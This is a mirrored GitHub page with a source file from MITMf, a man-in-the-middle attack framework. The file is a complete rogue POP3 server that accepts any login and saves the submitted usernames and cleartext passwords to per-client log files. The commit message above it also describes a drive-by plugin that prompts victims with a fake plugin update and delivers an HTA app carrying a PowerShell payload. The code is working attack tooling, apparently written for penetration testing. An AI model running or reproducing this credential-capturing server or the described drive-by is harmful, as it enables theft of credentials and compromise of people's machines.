mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
65 lines
No EOL
1.8 KiB
Python
65 lines
No EOL
1.8 KiB
Python
import logging
|
|
import threading
|
|
|
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
|
from core.responder.common import *
|
|
from core.responder.odict import OrderedDict
|
|
from core.responder.packet import Packet
|
|
from core.logger import logger
|
|
|
|
formatter = logging.Formatter("%(asctime)s [POP3server] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
|
log = logger().setup_logger("POP3server", formatter)
|
|
|
|
class POP3server():
|
|
|
|
def start(self):
|
|
try:
|
|
log.debug("online")
|
|
server = ThreadingTCPServer(("0.0.0.0", 110), POP)
|
|
t = threading.Thread(name="POP3server", target=server.serve_forever)
|
|
t.setDaemon(True)
|
|
t.start()
|
|
except Exception as e:
|
|
log.error("Error starting on port {}: {}".format(110, e))
|
|
|
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
|
|
allow_reuse_address = 1
|
|
|
|
def server_bind(self):
|
|
TCPServer.server_bind(self)
|
|
|
|
|
|
class POPOKPacket(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "+OK"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
#POP3 server class.
|
|
class POP(BaseRequestHandler):
|
|
|
|
def handle(self):
|
|
try:
|
|
self.request.send(str(POPOKPacket()))
|
|
data = self.request.recv(1024)
|
|
if data[0:4] == "USER":
|
|
User = data[5:].replace("\r\n","")
|
|
log.info('POP3 User: %s'%(User))
|
|
t = POPOKPacket()
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
if data[0:4] == "PASS":
|
|
Pass = data[5:].replace("\r\n","")
|
|
Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
|
|
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
|
log.info("POP3 Credentials from {}. User/Pass: {}:{} ".format(self.client_address[0],User,Pass))
|
|
t = POPOKPacket()
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
else :
|
|
t = POPOKPacket()
|
|
self.request.send(str(t))
|
|
data = self.request.recv(1024)
|
|
except Exception as e:
|
|
log.error("Error handling request: {}".format(e)) |